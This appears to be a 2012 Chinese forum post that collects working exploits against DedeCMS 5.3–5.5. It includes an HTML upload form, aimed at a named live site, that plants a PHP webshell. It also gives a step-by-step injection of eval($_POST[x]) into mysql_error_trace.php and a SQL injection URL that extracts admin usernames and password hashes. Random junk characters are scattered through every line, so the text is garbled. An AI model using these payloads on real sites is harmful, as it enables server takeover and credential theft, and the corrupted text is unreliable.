! L- X J) t) R# ]' _4 g+ c6 ^<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
( s7 p' B/ n# b! G" }! R1 Y</head>
8 n9 z4 c! _+ q3 Y0 D, J, k<body style="FONT-SIZE: 9pt">
8 l' o) ^2 D2 x& ^7 P---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />0 N2 }( q+ B+ i" j, ~
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>2 f4 m& U( G+ i, g
<input type='hidden' name='activepath' value='/data/cache/' />
' g8 x9 ]9 s4 B1 h$ \<input type='hidden' name='cfg_basedir' value='../../' />; x+ Y. I/ u& @+ r+ w& Q
<input type='hidden' name='cfg_imgtype' value='php' />
) T& C4 o/ j0 M+ ]8 Y$ G( t( k' i<input type='hidden' name='cfg_not_allowall' value='txt' />) n- b$ |/ e0 V% w
<input type='hidden' name='cfg_softtype' value='php' />
3 @! O3 ^4 l# D# B5 t2 e<input type='hidden' name='cfg_mediatype' value='php' />
1 V4 ^. t0 [. u, V<input type='hidden' name='f' value='form1.enclosure' />
5 x' ]5 M2 k6 u3 k<input type='hidden' name='job' value='upload' />; j: @3 ^+ L3 ^+ ^ J* X2 f! z
<input type='hidden' name='newname' value='fly.php' />* c6 R# f. m; V5 y6 ^. s
Select U Shell <input type='file' name='uploadfile' size='25' />- a. r6 E: Z. e
<input type='submit' name='sb1' value='确定' />" o# u; |+ r/ ~, o, L5 m. a
</form>1 Q+ q, c' H: T& N
<br />It's just a exp for the bug of Dedecms V55...<br />7 a$ R; r% H# w/ ]; D
Need register_globals = on...<br />8 \7 j" m" ?* D1 j1 }6 `
Fun the game,get a webshell at /data/cache/fly.php...<br />
1 \8 R: A s) l* z& R k</body>
( p. A; v$ \1 f* c' x6 ~ u</html>
/ A( X6 U/ n# u' z/ S/ s% c# ]
# x- Q; C4 o# P& B9 ~; Z; p
5 _/ X( E, P9 @# i$ p M* U* U* j3 Q& _, H, X. v
2 Y$ t% g5 Z. X4 N0 M' g
9 a5 O0 ]' a% |" b# N! i# s" x
' D/ w9 e! B$ K8 j0 _
+ o4 P/ |* t& z% p2 x& p' U6 \3 r) b7 m: E/ D' U0 u
% S( t1 Z: u o4 q
" ^9 t* m4 _6 Q: \$ W6 q$ j# S
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞3 }, `% A$ L: R2 r
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
+ H: |3 A! K4 f9 ?, |4 g1. 访问网址:
. q' k- t- w6 k" M5 L" t* Thttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>; {/ x$ F1 F/ p3 }/ x
可看见错误信息% f0 d( L9 V& I3 ~) a# \
% p% v0 g! E" m! W# ?
% N" U) I3 M1 Q7 R. y- q2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
: \, X, [6 ^, Q9 ^( Iint(3) Error: Illegal double '1024e1024' value found during parsing
& Z: ~6 B2 `. b" y, _4 }& x* GError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>0 N$ ^6 O4 [$ `
: U( V2 z7 r: l+ z' @" m
/ `9 n, p' U7 t3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
w6 E+ d: K) k. p3 K' K! ~' e- Q% b( G, I
C/ H P/ H2 o0 h
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
- L t' `# p! [' ~8 J7 @# y6 R: C7 L% t3 b. C$ N: e
) {, U# w0 C& R V' b
按确定后的看到第2步骤的信息表示文件木马上传成功.
H6 M4 |+ b8 P; t% i, {( C1 |7 H# z& i7 ]8 g; R
* F( H' N6 Q* h9 J7 X
8 C$ d- H! c+ F3 A$ q- b9 Y( c
5 o" u0 y( A' b) T( @$ A( H% I+ T8 X4 X+ R1 X
& M/ _8 L+ Q! j( X- W0 K) C9 i4 J& {3 n3 X2 Z# {/ n/ n
, \6 @+ c8 z. E Z, J: c
) {' g6 Y8 Y$ y3 o) \( T2 b9 U( G- T0 m- D
% K( c6 U0 @* b' u# V
- N: G; W- q# p0 H% A织梦(DedeCms)plus/infosearch.php 文件注入漏洞# ?- L6 d1 m% I$ p/ V& D0 I
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对